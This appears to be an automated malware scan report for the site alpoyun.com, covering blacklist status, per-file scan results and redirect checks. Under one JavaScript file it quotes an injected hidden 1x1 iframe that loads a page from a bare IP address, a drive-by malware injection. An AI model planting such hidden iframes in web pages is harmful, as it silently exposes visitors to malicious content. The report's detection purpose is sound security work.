Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alpoyun.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alpoyun.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://alpoyun.com/ | 200 OK Content-Length: 26456 Content-Type: text/html | clean |
http://alpoyun.com/js/prototype.js | 200 OK Content-Length: 61894 Content-Type: text/html | clean |
http://alpoyun.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://alpoyun.com/js/slider.js | 200 OK Content-Length: 11283 Content-Type: text/html | clean |
http://alpoyun.com/js/functions.js | 200 OK Content-Length: 1278 Content-Type: text/html | clean |
http://alpoyun.com/js/bb_code.js | 200 OK Content-Length: 4074 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://129.121.35.147/home/index.php <iframe frameborder=0 src="http://129.121.35.147/home/index.php" width=1 height=1 scrolling=no> | ||
http://www.realist.gen.tr/realist.php?id=50003 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 19:59:30 GMT Location: http://reali.st/realist.php?id=50003 Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://reali.st/realist.php?id=50003 | 200 OK Content-Length: 911 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.alpoyun.com function istatistik(){window.open("http://www.realist.gen.tr/istatistik/50003/");} var rt1='<a href=http://www.realist.gen.tr/listele/2/15/eglence-oyun.htm>EĆ°lence Oyun</a>'; var rt2='<a href=http://www.realist.gen.tr/uyeler/50003/alpoyun-bedava-oyunlar.htm>http://www.alpoyun.com</a>'; var re1="?id=50003"; re1+="&l=12"; re1+="&a=1"; re1+="&ref2=" + escape(document.location); re1+="&referrer=" + escape(document.referrer); re1+="&mwidth=" + screen.width; re1+="&mheight=" + screen.height; re1+="&mcolordepth=" + screen.colorDepth; document.write('<a href="http://www.realist.gen.tr/i/50003/" target="_blank" onclick="istatistik();"><img src= ...[299 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alpoyun.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 19:59:20 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Ngpass_all: 1
GET / HTTP/1.1
Host: alpoyun.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 19:59:20 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Ngpass_all: 1
Second query (visit from search engine):
GET / HTTP/1.1
Host: alpoyun.com
Referer: http://www.google.com/search?q=alpoyun.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alpoyun.com
Referer: http://www.google.com/search?q=alpoyun.com
Result:
The result is similar to the first query. There are no suspicious redirects found.